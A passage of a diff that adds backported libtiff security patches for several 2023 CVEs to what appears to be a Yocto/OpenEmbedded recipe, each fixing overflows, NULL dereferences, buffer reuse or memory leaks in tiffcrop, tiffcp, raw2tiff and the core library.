+ static int mirrorImage(uint16, uint16, uint16, uint32, uint32,
+ unsigned char *);
+ static int invertImage(uint16, uint16, uint16, uint32, uint32,
+@@ -6382,10 +6382,11 @@ static int correct_orientation(struct image_data *image, unsigned char **work_b
+ /* Dummy variable in order not to switch two times the
+ * image->width,->length within rotateImage(),
+ * but switch xres, yres there. */
+- uint32_t width = image->width;
+- uint32_t length = image->length;
+- if (rotateImage(rotation, image, &width, &length, work_buff_ptr, NULL))
+- {
++ uint32_t width = image->width;
++ uint32_t length = image->length;
++ if (rotateImage(rotation, image, &width, &length, work_buff_ptr, NULL,
++ TRUE))
++ {
+ TIFFError ("correct_orientation", "Unable to rotate image");
+ return (-1);
+ }
+@@ -7612,7 +7613,8 @@ processCropSelections(struct image_data *image, struct crop_mask *crop,
+ * accordingly. */
+ size_t rot_buf_size = 0;
+ if (rotateImage(crop->rotation, image, &crop->combined_width,
+- &crop->combined_length, &crop_buff, &rot_buf_size))
++ &crop->combined_length, &crop_buff, &rot_buf_size,
++ FALSE))
+ {
+ TIFFError("processCropSelections",
+ "Failed to rotate composite regions by %d degrees", crop->rotation);
+@@ -7721,9 +7723,10 @@ processCropSelections(struct image_data *image, struct crop_mask *crop,
+ * its size individually. Therefore, seg_buffs size needs to be
+ * updated accordingly. */
+ size_t rot_buf_size = 0;
+- if (rotateImage(
+- crop->rotation, image, &crop->regionlist[i].width,
+- &crop->regionlist[i].length, &crop_buff, &rot_buf_size))
++ if (rotateImage(crop->rotation, image,
++ &crop->regionlist[i].width,
++ &crop->regionlist[i].length, &crop_buff,
++ &rot_buf_size, FALSE))
+ {
+ TIFFError("processCropSelections",
+ "Failed to rotate crop region by %d degrees", crop->rotation);
+@@ -7853,7 +7856,7 @@ createCroppedImage(struct image_data *image, struct crop_mask *crop,
+ if (crop->crop_mode & CROP_ROTATE) /* rotate should be last as it can reallocate the buffer */
+ {
+ if (rotateImage(crop->rotation, image, &crop->combined_width,
+- &crop->combined_length, crop_buff_ptr, NULL))
++ &crop->combined_length, crop_buff_ptr, NULL, TRUE))
+ {
+ TIFFError("createCroppedImage",
+ "Failed to rotate image or cropped selection by %d degrees", crop->rotation);
+@@ -8515,8 +8518,10 @@ rotateContigSamples32bits(uint16 rotation, uint16 spp, uint16 bps, uint32 width,
+
+ /* Rotate an image by a multiple of 90 degrees clockwise */
+ static int
+-rotateImage(uint16 rotation, struct image_data *image, uint32 *img_width,
+- uint32 *img_length, unsigned char **ibuff_ptr, int rot_image_params)
++rotateImage(uint16 rotation, struct image_data *image,
++ uint32 *img_width, uint32 *img_length,
++ unsigned char **ibuff_ptr, size_t *rot_buf_size,
++ int rot_image_params)
+ {
+ int shift_width;
+ uint32 bytes_per_pixel, bytes_per_sample;
+--
+2.25.1
+
diff --git a/meta/recipes-multimedia/libtiff/files/CVE-2023-26965.patch b/meta/recipes-multimedia/libtiff/files/CVE-2023-26965.patch
new file mode 100644
index 0000000000..b7a7e93764
--- /dev/null
+++ b/meta/recipes-multimedia/libtiff/files/CVE-2023-26965.patch
@@ -0,0 +1,90 @@
+From ec8ef90c1f573c9eb1f17d6a056aa0015f184acf Mon Sep 17 00:00:00 2001
+From: Su_Laus <sulau@freenet.de>
+Date: Tue, 14 Feb 2023 20:43:43 +0100
+Subject: [PATCH] tiffcrop: Do not reuse input buffer for subsequent images.
+ Fix issue 527
+
+Reuse of read_buff within loadImage() from previous image is quite unsafe, because other functions (like rotateImage() etc.) reallocate that buffer with different size without updating the local prev_readsize value.
+
+Closes #527
+
+Upstream-Status: Backport [import from debian http://security.debian.org/debian-security/pool/updates/main/t/tiff/tiff_4.1.0+git191117-2~deb10u8.debian.tar.xz]
+CVE: CVE-2023-26965
+Signed-off-by: Hitendra Prajapati <hprajapati@mvista.com>
+---
+ tools/tiffcrop.c | 40 ++++++++++------------------------------
+ 1 file changed, 10 insertions(+), 30 deletions(-)
+
+diff --git a/tools/tiffcrop.c b/tools/tiffcrop.c
+index ce84414..a533089 100644
+--- a/tools/tiffcrop.c
++++ b/tools/tiffcrop.c
+@@ -5935,9 +5935,7 @@ loadImage(TIFF* in, struct image_data *image, struct dump_opts *dump, unsigned c
+ uint32 tw = 0, tl = 0; /* Tile width and length */
+ tmsize_t tile_rowsize = 0;
+ unsigned char *read_buff = NULL;
+- unsigned char *new_buff = NULL;
+ int readunit = 0;
+- static tmsize_t prev_readsize = 0;
+
+ TIFFGetFieldDefaulted(in, TIFFTAG_BITSPERSAMPLE, &bps);
+ TIFFGetFieldDefaulted(in, TIFFTAG_SAMPLESPERPIXEL, &spp);
+@@ -6232,37 +6230,20 @@ loadImage(TIFF* in, struct image_data *image, struct dump_opts *dump, unsigned c
+ read_buff = *read_ptr;
+ /* +3 : add a few guard bytes since reverseSamples16bits() can read a bit */
+ /* outside buffer */
+- if (!read_buff)
++ if (read_buff)
+ {
+- if( buffsize > 0xFFFFFFFFU - 3 )
+- {
+- TIFFError("loadImage", "Unable to allocate/reallocate read buffer");
+- return (-1);
+- }
+- read_buff = (unsigned char *)_TIFFmalloc(buffsize + NUM_BUFF_OVERSIZE_BYTES);
++ _TIFFfree(read_buff);
+ }
+- else
+- {
+- if (prev_readsize < buffsize)
+- {
+- if( buffsize > 0xFFFFFFFFU - 3 )
+- {
+- TIFFError("loadImage", "Unable to allocate/reallocate read buffer");
+- return (-1);
+- }
+- new_buff = _TIFFrealloc(read_buff, buffsize + NUM_BUFF_OVERSIZE_BYTES);
+- if (!new_buff)
+- {
+- free (read_buff);
+- read_buff = (unsigned char *)_TIFFmalloc(buffsize + NUM_BUFF_OVERSIZE_BYTES);
+- }
+- else
+- read_buff = new_buff;
+- }
+- }
++ if (buffsize > 0xFFFFFFFFU - 3)
++ {
++ TIFFError("loadImage", "Required read buffer size too large");
++ return (-1);
++ }
++ read_buff =
++ (unsigned char *)_TIFFmalloc(buffsize + NUM_BUFF_OVERSIZE_BYTES);
+ if (!read_buff)
+ {
+- TIFFError("loadImage", "Unable to allocate/reallocate read buffer");
++ TIFFError("loadImage", "Unable to allocate read buffer");
+ return (-1);
+ }
+
+@@ -6270,7 +6251,6 @@ loadImage(TIFF* in, struct image_data *image, struct dump_opts *dump, unsigned c
+ read_buff[buffsize+1] = 0;
+ read_buff[buffsize+2] = 0;
+
+- prev_readsize = buffsize;
+ *read_ptr = read_buff;
+
+ /* N.B. The read functions used copy separate plane data into a buffer as interleaved
+--
+2.25.1
+
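The unsafe pattern described above is a stale size cache: a static prev_readsize inside loadImage() cannot see reallocations done by other routines, so a later reuse of the buffer can run past its real size. A condensed sketch of the allocate-fresh pattern the fix switches to; the names and guard-byte count are illustrative:

#include <stdint.h>
#include <stdlib.h>
#include <string.h>

#define GUARD_BYTES 3   /* stands in for NUM_BUFF_OVERSIZE_BYTES */

/* Pattern adopted by the fix: never trust a size remembered for a buffer
 * that other routines may have reallocated -- free it and allocate fresh. */
unsigned char *fresh_read_buffer(unsigned char *old, size_t buffsize)
{
    unsigned char *buf;

    free(old);                               /* free(NULL) is a no-op */
    if (buffsize > SIZE_MAX - GUARD_BYTES)
        return NULL;                         /* reject oversized requests */
    buf = malloc(buffsize + GUARD_BYTES);
    if (buf != NULL)
        memset(buf + buffsize, 0, GUARD_BYTES);  /* zero the guard bytes */
    return buf;
}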
diff --git a/meta/recipes-multimedia/libtiff/files/CVE-2023-26966.patch b/meta/recipes-multimedia/libtiff/files/CVE-2023-26966.patch
new file mode 100644
index 0000000000..48657e6aa4
--- /dev/null
+++ b/meta/recipes-multimedia/libtiff/files/CVE-2023-26966.patch
@@ -0,0 +1,35 @@
+From b0e1c25dd1d065200c8d8f59ad0afe014861a1b9 Mon Sep 17 00:00:00 2001
+From: Su_Laus <sulau@freenet.de>
+Date: Thu, 16 Feb 2023 12:03:16 +0100
+Subject: [PATCH] tif_luv: Check and correct for NaN data in uv_encode().
+
+Closes #530
+
+Upstream-Status: Backport [import from debian http://security.debian.org/debian-security/pool/updates/main/t/tiff/tiff_4.1.0+git191117-2~deb10u8.debian.tar.xz]
+CVE: CVE-2023-26966
+Signed-off-by: Hitendra Prajapati <hprajapati@mvista.com>
+---
+ libtiff/tif_luv.c | 7 +++++++
+ 1 file changed, 7 insertions(+)
+
+diff --git a/libtiff/tif_luv.c b/libtiff/tif_luv.c
+index 6fe4858..8b2c5f1 100644
+--- a/libtiff/tif_luv.c
++++ b/libtiff/tif_luv.c
+@@ -923,6 +923,13 @@ uv_encode(double u, double v, int em) /* encode (u',v') coordinates */
+ {
+ register int vi, ui;
+
++ /* check for NaN */
++ if (u != u || v != v)
++ {
++ u = U_NEU;
++ v = V_NEU;
++ }
++
+ if (v < UV_VSTART)
+ return oog_encode(u, v);
+ vi = itrunc((v - UV_VSTART)*(1./UV_SQSIZ), em);
+--
+2.25.1
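The u != u test added above relies on IEEE 754 semantics: NaN compares unequal to every value, including itself, so the expression is true only for NaN. A small stand-alone illustration of the idiom; the neutral fallback values are illustrative, not necessarily the U_NEU/V_NEU constants from tif_luv.c:

#include <math.h>
#include <stdio.h>

int main(void)
{
    /* Illustrative neutral fallback values, not the real libtiff constants. */
    const double u_neutral = 0.210526316;
    const double v_neutral = 0.473684211;

    double u = nan("");   /* simulate corrupted (u', v') input */
    double v = 0.4;

    /* NaN is the only value for which x != x holds, so this catches NaN
     * in either coordinate -- the same idiom the fix adds to uv_encode(). */
    if (u != u || v != v) {
        u = u_neutral;
        v = v_neutral;
    }

    printf("u = %f, v = %f\n", u, v);
    return 0;
}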
+
diff --git a/meta/recipes-multimedia/libtiff/files/CVE-2023-2908.patch b/meta/recipes-multimedia/libtiff/files/CVE-2023-2908.patch
new file mode 100644
index 0000000000..62a5e1831c
--- /dev/null
+++ b/meta/recipes-multimedia/libtiff/files/CVE-2023-2908.patch
@@ -0,0 +1,33 @@
+From 8c0859a80444c90b8dfb862a9f16de74e16f0a9e Mon Sep 17 00:00:00 2001
+From: xiaoxiaoafeifei <lliangliang2007@163.com>
+Date: Fri, 21 Apr 2023 13:01:34 +0000
+Subject: [PATCH] countInkNamesString(): fix `UndefinedBehaviorSanitizer`:
+ applying zero offset to null pointer
+
+Upstream-Status: Backport [https://gitlab.com/libtiff/libtiff/-/commit/9bd48f0dbd64fb94dc2b5b05238fde0bfdd4ff3f]
+CVE: CVE-2023-2908
+Signed-off-by: Hitendra Prajapati <hprajapati@mvista.com>
+---
+ libtiff/tif_dir.c | 4 ++--
+ 1 file changed, 2 insertions(+), 2 deletions(-)
+
+diff --git a/libtiff/tif_dir.c b/libtiff/tif_dir.c
+index 9d8267a..6389b40 100644
+--- a/libtiff/tif_dir.c
++++ b/libtiff/tif_dir.c
+@@ -145,10 +145,10 @@ static uint16
+ countInkNamesString(TIFF *tif, uint32 slen, const char *s)
+ {
+ uint16 i = 0;
+- const char *ep = s + slen;
+- const char *cp = s;
+
+ if (slen > 0) {
++ const char *ep = s + slen;
++ const char *cp = s;
+ do {
+ for (; cp < ep && *cp != '\0'; cp++) {}
+ if (cp >= ep)
+--
+2.25.1
+
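The UndefinedBehaviorSanitizer report behind this fix is triggered by forming s + slen while s is NULL and slen is 0; pointer arithmetic on a null pointer is undefined in C even with a zero offset. A minimal sketch of the corrected pattern, with the arithmetic moved inside the length check; the function below is illustrative, not the libtiff countInkNamesString():

#include <stddef.h>
#include <stdint.h>

/* Count the NUL-terminated names packed into a buffer of slen bytes.
 * The pointer arithmetic is guarded by the length check, so s + slen
 * is never formed for a NULL buffer with slen == 0. */
uint16_t count_names(const char *s, uint32_t slen)
{
    uint16_t i = 0;

    if (slen > 0) {
        const char *ep = s + slen;   /* only computed when a buffer exists */
        const char *cp = s;
        do {
            for (; cp < ep && *cp != '\0'; cp++) {}
            if (cp >= ep)
                break;               /* trailing name not terminated: stop */
            i++;
            cp++;                    /* step over the terminating NUL */
        } while (cp < ep);
    }
    return i;
}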
diff --git a/meta/recipes-multimedia/libtiff/files/CVE-2023-3316.patch b/meta/recipes-multimedia/libtiff/files/CVE-2023-3316.patch
new file mode 100644
index 0000000000..8db24fc714
--- /dev/null
+++ b/meta/recipes-multimedia/libtiff/files/CVE-2023-3316.patch
@@ -0,0 +1,59 @@
+From d63de61b1ec3385f6383ef9a1f453e4b8b11d536 Mon Sep 17 00:00:00 2001
+From: Su_Laus <sulau@freenet.de>
+Date: Fri, 3 Feb 2023 17:38:55 +0100
+Subject: [PATCH] TIFFClose() avoid NULL pointer dereferencing. fix#515
+
+Closes #515
+
+Upstream-Status: Backport [https://gitlab.com/libtiff/libtiff/-/commit/d63de61b1ec3385f6383ef9a1f453e4b8b11d536]
+CVE: CVE-2023-3316
+Signed-off-by: Hitendra Prajapati <hprajapati@mvista.com>
+---
+ libtiff/tif_close.c | 11 +++++++----
+ tools/tiffcrop.c | 5 ++++-
+ 2 files changed, 11 insertions(+), 5 deletions(-)
+
+diff --git a/libtiff/tif_close.c b/libtiff/tif_close.c
+index e4228df..335e80f 100644
+--- a/libtiff/tif_close.c
++++ b/libtiff/tif_close.c
+@@ -118,13 +118,16 @@ TIFFCleanup(TIFF* tif)
+ */
+
+ void
+-TIFFClose(TIFF* tif)
++TIFFClose(TIFF *tif)
+ {
+- TIFFCloseProc closeproc = tif->tif_closeproc;
+- thandle_t fd = tif->tif_clientdata;
++ if (tif != NULL)
++ {
++ TIFFCloseProc closeproc = tif->tif_closeproc;
++ thandle_t fd = tif->tif_clientdata;
+
+ TIFFCleanup(tif);
+- (void) (*closeproc)(fd);
++ (void)(*closeproc)(fd);
++ }
+ }
+
+ /* vim: set ts=8 sts=8 sw=8 noet: */
+diff --git a/tools/tiffcrop.c b/tools/tiffcrop.c
+index a533089..f14bb0c 100644
+--- a/tools/tiffcrop.c
++++ b/tools/tiffcrop.c
+@@ -2526,7 +2526,10 @@ main(int argc, char* argv[])
+ }
+ }
+
+- TIFFClose(out);
++ if (out != NULL)
++ {
++ TIFFClose(out);
++ }
+
+ return (0);
+ } /* end main */
+--
+2.25.1
+
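The change makes TIFFClose() tolerate a NULL handle the way free() does, so error paths need not guard every close call. A minimal sketch of that NULL-tolerant destructor pattern, with an invented handle type rather than the TIFF structure:

    #include <stdio.h>
    #include <stdlib.h>

    /* Hypothetical handle; stands in for TIFF* in this sketch. */
    struct handle {
        FILE *fp;
    };

    /* NULL-tolerant close: safe on error paths where the handle may never
     * have been created, mirroring the TIFFClose() fix above. */
    static void handle_close(struct handle *h)
    {
        if (h != NULL) {
            if (h->fp != NULL)
                fclose(h->fp);
            free(h);
        }
    }

    int main(void)
    {
        struct handle *h = NULL;      /* e.g. open failed earlier */
        handle_close(h);              /* no crash: the guard absorbs NULL */
        return 0;
    }
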
diff --git a/meta/recipes-multimedia/libtiff/files/CVE-2023-3576.patch b/meta/recipes-multimedia/libtiff/files/CVE-2023-3576.patch
new file mode 100644
index 0000000000..67837fe142
--- /dev/null
+++ b/meta/recipes-multimedia/libtiff/files/CVE-2023-3576.patch
@@ -0,0 +1,35 @@
+From 881a070194783561fd209b7c789a4e75566f7f37 Mon Sep 17 00:00:00 2001
+From: zhailiangliang <zhailiangliang@loongson.cn>
+Date: Tue, 7 Mar 2023 15:02:08 +0800
+Subject: [PATCH] Fix memory leak in tiffcrop.c
+
+Upstream-Status: Backport [https://gitlab.com/libtiff/libtiff/-/commit/881a070194783561fd209b7c789a4e75566f7f37]
+CVE: CVE-2023-3576
+Signed-off-by: Hitendra Prajapati <hprajapati@mvista.com>
+Signed-off-by: Vijay Anusuri <vanusuri@mvista.com>
+---
+ tools/tiffcrop.c | 7 ++++++-
+ 1 file changed, 6 insertions(+), 1 deletion(-)
+
+diff --git a/tools/tiffcrop.c b/tools/tiffcrop.c
+index f14bb0c..7121c7c 100644
+--- a/tools/tiffcrop.c
++++ b/tools/tiffcrop.c
+@@ -7746,8 +7746,13 @@ createCroppedImage(struct image_data *image, struct crop_mask *crop,
+
+ read_buff = *read_buff_ptr;
+
++ /* Memory is freed before crop_buff_ptr is overwritten */
++ if (*crop_buff_ptr != NULL)
++ {
++ _TIFFfree(*crop_buff_ptr);
++ }
++
+ /* process full image, no crop buffer needed */
+- crop_buff = read_buff;
+ *crop_buff_ptr = read_buff;
+ crop->combined_width = image->width;
+ crop->combined_length = image->length;
+--
+2.25.1
+
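The leak fixed here comes from repointing *crop_buff_ptr at read_buff while it still owns an earlier allocation. Generically: release whatever an owning pointer holds before reassigning it. A hedged sketch with a hypothetical adopt_buffer() helper (tiffcrop itself open-codes the free):

    #include <stdlib.h>
    #include <string.h>

    /* Repoint *owner at a new buffer, releasing whatever it owned before,
     * so the previous allocation cannot leak. */
    static void adopt_buffer(unsigned char **owner, unsigned char *replacement)
    {
        if (*owner != NULL && *owner != replacement)
            free(*owner);
        *owner = replacement;
    }

    int main(void)
    {
        unsigned char *crop_buff = malloc(64);   /* earlier allocation */
        unsigned char *read_buff = malloc(128);  /* buffer to reuse directly */

        if (crop_buff) memset(crop_buff, 0, 64);
        if (read_buff) memset(read_buff, 0, 128);

        adopt_buffer(&crop_buff, read_buff);     /* old 64-byte block is freed */

        free(crop_buff);                         /* frees read_buff's storage */
        return 0;
    }
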
diff --git a/meta/recipes-multimedia/libtiff/files/CVE-2023-3618.patch b/meta/recipes-multimedia/libtiff/files/CVE-2023-3618.patch
new file mode 100644
index 0000000000..fd67305c0b
--- /dev/null
+++ b/meta/recipes-multimedia/libtiff/files/CVE-2023-3618.patch
@@ -0,0 +1,47 @@
+From b5c7d4c4e03333ac16b5cfb11acaaeaa493334f8 Mon Sep 17 00:00:00 2001
+From: Su_Laus <sulau@freenet.de>
+Date: Fri, 5 May 2023 19:43:46 +0200
+Subject: [PATCH] Consider error return of writeSelections(). Fixes #553
+
+Upstream-Status: Backport [https://gitlab.com/libtiff/libtiff/-/commit/b5c7d4c4e03333ac16b5cfb11acaaeaa493334f8]
+CVE: CVE-2023-3618
+Signed-off-by: Hitendra Prajapati <hprajapati@mvista.com>
+---
+ tools/tiffcrop.c | 14 ++++++++++----
+ 1 file changed, 10 insertions(+), 4 deletions(-)
+
+diff --git a/tools/tiffcrop.c b/tools/tiffcrop.c
+index 7121c7c..93b7f96 100644
+--- a/tools/tiffcrop.c
++++ b/tools/tiffcrop.c
+@@ -2437,9 +2437,15 @@ main(int argc, char* argv[])
+ { /* Whole image or sections not based on output page size */
+ if (crop.selections > 0)
+ {
+- writeSelections(in, &out, &crop, &image, &dump, seg_buffs,
+- mp, argv[argc - 1], &next_page, total_pages);
+- }
++ if (writeSelections(in, &out, &crop, &image, &dump,
++ seg_buffs, mp, argv[argc - 1],
++ &next_page, total_pages))
++ {
++ TIFFError("main",
++ "Unable to write new image selections");
++ exit(EXIT_FAILURE);
++ }
++ }
+ else /* One file all images and sections */
+ {
+ if (update_output_file (&out, mp, crop.exp_mode, argv[argc - 1],
+@@ -7749,7 +7755,7 @@ createCroppedImage(struct image_data *image, struct crop_mask *crop,
+ /* Memory is freed before crop_buff_ptr is overwritten */
+ if (*crop_buff_ptr != NULL)
+ {
+- _TIFFfree(*crop_buff_ptr);
++ _TIFFfree(*crop_buff_ptr);
+ }
+
+ /* process full image, no crop buffer needed */
+--
+2.25.1
+
diff --git a/meta/recipes-multimedia/libtiff/files/CVE-2023-40745.patch b/meta/recipes-multimedia/libtiff/files/CVE-2023-40745.patch
new file mode 100644
index 0000000000..6eb286039f
--- /dev/null
+++ b/meta/recipes-multimedia/libtiff/files/CVE-2023-40745.patch
@@ -0,0 +1,34 @@
+From 4fc16f649fa2875d5c388cf2edc295510a247ee5 Mon Sep 17 00:00:00 2001
+From: Arie Haenel <arie.haenel@jct.ac.il>
+Date: Wed, 19 Jul 2023 19:34:25 +0000
+Subject: [PATCH] tiffcp: fix memory corruption (overflow) on hostile images
+ (fixes #591)
+
+Upstream-Status: Backport from [https://gitlab.com/libtiff/libtiff/-/commit/4fc16f649fa2875d5c388cf2edc295510a247ee5]
+CVE: CVE-2023-40745
+Signed-off-by: Hitendra Prajapati <hprajapati@mvista.com>
+---
+ tools/tiffcp.c | 7 +++++++
+ 1 file changed, 7 insertions(+)
+
+diff --git a/tools/tiffcp.c b/tools/tiffcp.c
+index 83b3910..007bd05 100644
+--- a/tools/tiffcp.c
++++ b/tools/tiffcp.c
+@@ -1437,6 +1437,13 @@ DECLAREreadFunc(readSeparateTilesIntoBuffer)
+ TIFFError(TIFFFileName(in), "Error, cannot handle that much samples per tile row (Tile Width * Samples/Pixel)");
+ return 0;
+ }
++
++ if ( (imagew - tilew * spp) > INT_MAX ){
++ TIFFError(TIFFFileName(in),
++ "Error, image raster scan line size is too large");
++ return 0;
++ }
++
+ iskew = imagew - tilew*spp;
+ tilebuf = _TIFFmalloc(tilesize);
+ if (tilebuf == 0)
+--
+2.25.1
+
diff --git a/meta/recipes-multimedia/libtiff/files/CVE-2023-41175.patch b/meta/recipes-multimedia/libtiff/files/CVE-2023-41175.patch
new file mode 100644
index 0000000000..3f44a42012
--- /dev/null
+++ b/meta/recipes-multimedia/libtiff/files/CVE-2023-41175.patch
@@ -0,0 +1,67 @@
+From 4cc97e3dfa6559f4d17af0d0687bcae07ca4b73d Mon Sep 17 00:00:00 2001
+From: Arie Haenel <arie.haenel@jct.ac.il>
+Date: Wed, 19 Jul 2023 19:40:01 +0000
+Subject: raw2tiff: fix integer overflow and bypass of the check (fixes #592)
+
+Upstream-Status: Backport [import from debian security.debian.org/debian-security/pool/updates/main/t/tiff/tiff_4.1.0+git191117-2~deb10u8.debian.tar.xz
+Upstream commit https://gitlab.com/libtiff/libtiff/-/commit/6e2dac5f904496d127c92ddc4e56eccfca25c2ee]
+CVE: CVE-2023-41175
+Signed-off-by: Vijay Anusuri <vanusuri@mvista.com>
+---
+ tools/raw2tiff.c | 26 ++++++++++++++++++++++++++
+ 1 file changed, 26 insertions(+)
+
+diff --git a/tools/raw2tiff.c b/tools/raw2tiff.c
+index ab36ff4e..a905da52 100644
+--- a/tools/raw2tiff.c
++++ b/tools/raw2tiff.c
+@@ -35,6 +35,7 @@
+ #include <sys/types.h>
+ #include <math.h>
+ #include <ctype.h>
++#include <limits.h>
+
+ #ifdef HAVE_UNISTD_H
+ # include <unistd.h>
+@@ -101,6 +102,7 @@ main(int argc, char* argv[])
+ int fd;
+ char *outfilename = NULL;
+ TIFF *out;
++ uint32 temp_limit_check = 0;
+
+ uint32 row, col, band;
+ int c;
+@@ -212,6 +214,30 @@ main(int argc, char* argv[])
+ if (guessSize(fd, dtype, hdr_size, nbands, swab, &width, &length) < 0)
+ return 1;
+
++ if ((width == 0) || (length == 0) ){
++ fprintf(stderr, "Too large nbands value specified.\n");
++ return (EXIT_FAILURE);
++ }
++
++ temp_limit_check = nbands * depth;
++
++ if ( !temp_limit_check || length > ( UINT_MAX / temp_limit_check ) ) {
++ fprintf(stderr, "Too large length size specified.\n");
++ return (EXIT_FAILURE);
++ }
++ temp_limit_check = temp_limit_check * length;
++
++ if ( !temp_limit_check || width > ( UINT_MAX / temp_limit_check ) ) {
++ fprintf(stderr, "Too large width size specified.\n");
++ return (EXIT_FAILURE);
++ }
++ temp_limit_check = temp_limit_check * width;
++
++ if ( !temp_limit_check || hdr_size > ( UINT_MAX - temp_limit_check ) ) {
++ fprintf(stderr, "Too large header size specified.\n");
++ return (EXIT_FAILURE);
++ }
++
+ if (outfilename == NULL)
+ outfilename = argv[optind+1];
+ out = TIFFOpen(outfilename, "w");
+--
+2.30.2
+
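The added raw2tiff checks are standard unsigned overflow guards: before each multiplication, compare the running product against UINT_MAX divided by the next factor, and before the final addition compare against UINT_MAX minus the product. A standalone sketch of the same idiom (the helper names here are invented, not libtiff API):

    #include <limits.h>
    #include <stdio.h>

    /* Multiply *a by b, returning 0 on unsigned overflow: the
     * "compare against UINT_MAX / b before multiplying" idiom. */
    static int mul_ok(unsigned int *a, unsigned int b)
    {
        if (b != 0 && *a > UINT_MAX / b)
            return 0;
        *a *= b;
        return 1;
    }

    /* Total input size: width * length * nbands * depth + hdr_size. */
    static int checked_input_size(unsigned int width, unsigned int length,
                                  unsigned int nbands, unsigned int depth,
                                  unsigned int hdr_size, unsigned int *out)
    {
        unsigned int total = 1;

        if (width == 0 || length == 0 || nbands == 0 || depth == 0)
            return 0;                             /* nothing sensible to size */
        if (!mul_ok(&total, nbands) || !mul_ok(&total, depth) ||
            !mul_ok(&total, length) || !mul_ok(&total, width))
            return 0;                             /* product would wrap */
        if (hdr_size > UINT_MAX - total)
            return 0;                             /* sum would wrap */
        *out = total + hdr_size;
        return 1;
    }

    int main(void)
    {
        unsigned int size;
        if (!checked_input_size(70000u, 70000u, 3u, 1u, 0u, &size))
            printf("rejected: size would overflow unsigned int\n");
        return 0;
    }
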
diff --git a/meta/recipes-multimedia/libtiff/files/CVE-2023-52356.patch b/meta/recipes-multimedia/libtiff/files/CVE-2023-52356.patch
new file mode 100644
index 0000000000..1b651e6529
--- /dev/null
+++ b/meta/recipes-multimedia/libtiff/files/CVE-2023-52356.patch
@@ -0,0 +1,53 @@
+[Ubuntu note: Backport of the following patch from upstream, with a few changes
+to match the current version of the file in the present Ubuntu release:
+ . using TIFFErrorExt instead of TIFFErrorExtR (the latter did not exist yet);
+-- Rodrigo Figueiredo Zaiden]
+
+Backport of:
+
+From 51558511bdbbcffdce534db21dbaf5d54b31638a Mon Sep 17 00:00:00 2001
+From: Even Rouault <even.rouault@spatialys.com>
+Date: Tue, 31 Oct 2023 15:58:41 +0100
+Subject: [PATCH] TIFFReadRGBAStrip/TIFFReadRGBATile: add more validation of
+ col/row (fixes #622)
+
+Upstream-Status: Backport [import from ubuntu https://git.launchpad.net/ubuntu/+source/tiff/tree/debian/patches/CVE-2023-52356.patch?h=ubuntu/focal-security
+Upstream commit https://gitlab.com/libtiff/libtiff/-/commit/51558511bdbbcffdce534db21dbaf5d54b31638a]
+CVE: CVE-2023-52356
+Signed-off-by: Vijay Anusuri <vanusuri@mvista.com>
+---
+ libtiff/tif_getimage.c | 15 +++++++++++++++
+ 1 file changed, 15 insertions(+)
+
+
+--- tiff-4.1.0+git191117.orig/libtiff/tif_getimage.c
++++ tiff-4.1.0+git191117/libtiff/tif_getimage.c
+@@ -2926,6 +2926,13 @@ TIFFReadRGBAStripExt(TIFF* tif, uint32 r
+ }
+
+ if (TIFFRGBAImageOK(tif, emsg) && TIFFRGBAImageBegin(&img, tif, stop_on_error, emsg)) {
++ if (row >= img.height)
++ {
++ TIFFErrorExt(tif->tif_clientdata, TIFFFileName(tif),
++ "Invalid row passed to TIFFReadRGBAStrip().");
++ TIFFRGBAImageEnd(&img);
++ return (0);
++ }
+
+ img.row_offset = row;
+ img.col_offset = 0;
+@@ -3002,6 +3009,14 @@ TIFFReadRGBATileExt(TIFF* tif, uint32 co
+ return( 0 );
+ }
+
++ if (col >= img.width || row >= img.height)
++ {
++ TIFFErrorExt(tif->tif_clientdata, TIFFFileName(tif),
++ "Invalid row/col passed to TIFFReadRGBATile().");
++ TIFFRGBAImageEnd(&img);
++ return (0);
++ }
++
+ /*
+ * The TIFFRGBAImageGet() function doesn't allow us to get off the
+ * edge of the image, even to fill an otherwise valid tile. So we
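Both hunks add the same kind of bounds check: a caller-supplied row or column must be strictly less than the decoded image's height or width before it is used as an offset. A small sketch of that validation, with an invented rgba_image struct standing in for TIFFRGBAImage:

    #include <inttypes.h>
    #include <stdio.h>

    /* Hypothetical image descriptor; stands in for the TIFFRGBAImage
     * fields the real checks consult. */
    struct rgba_image {
        uint32_t width;
        uint32_t height;
    };

    /* Reject an out-of-range origin before any offset math, in the spirit
     * of the TIFFReadRGBAStrip()/TIFFReadRGBATile() guards above. */
    static int origin_in_range(const struct rgba_image *img,
                               uint32_t col, uint32_t row)
    {
        if (col >= img->width || row >= img->height) {
            fprintf(stderr, "invalid col/row %" PRIu32 "/%" PRIu32
                    " for %" PRIu32 "x%" PRIu32 " image\n",
                    col, row, img->width, img->height);
            return 0;
        }
        return 1;
    }

    int main(void)
    {
        struct rgba_image img = { 640, 480 };
        printf("%d\n", origin_in_range(&img, 0, 0));      /* 1: inside       */
        printf("%d\n", origin_in_range(&img, 640, 10));   /* 0: col == width */
        return 0;
    }
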
diff --git a/meta/recipes-multimedia/libtiff/files/CVE-2023-6228.patch b/meta/recipes-multimedia/libtiff/files/CVE-2023-6228.patch
new file mode 100644
index 0000000000..a777dea9b0
--- /dev/null
+++ b/meta/recipes-multimedia/libtiff/files/CVE-2023-6228.patch
@@ -0,0 +1,30 @@
+From 1e7d217a323eac701b134afc4ae39b6bdfdbc96a Mon Sep 17 00:00:00 2001
+From: Su_Laus <sulau@freenet.de>
+Date: Sat, 9 Sep 2023 15:45:47 +0200
+Subject: [PATCH] Check also if codec of input image is available,
+ independently from codec check of output image and return with error if not.
+ Fixes #606.
+
+Upstream-Status: Backport [https://gitlab.com/libtiff/libtiff/-/commit/1e7d217a323eac701b134afc4ae39b6bdfdbc96a]
+CVE: CVE-2023-6228
+Signed-off-by: Vijay Anusuri <vanusuri@mvista.com>
+---
+ tools/tiffcp.c | 2 ++
+ 1 file changed, 2 insertions(+)
+
+diff --git a/tools/tiffcp.c b/tools/tiffcp.c
+index 007bd05..d2f7b66 100644
+--- a/tools/tiffcp.c
++++ b/tools/tiffcp.c
+@@ -628,6 +628,8 @@ tiffcp(TIFF* in, TIFF* out)
+ else
+ CopyField(TIFFTAG_COMPRESSION, compression);
+ TIFFGetFieldDefaulted(in, TIFFTAG_COMPRESSION, &input_compression);
++ if (!TIFFIsCODECConfigured(input_compression))
++ return FALSE;
+ TIFFGetFieldDefaulted(in, TIFFTAG_PHOTOMETRIC, &input_photometric);
+ if (input_compression == COMPRESSION_JPEG) {
+ /* Force conversion to RGB */
+--
+2.25.1
+
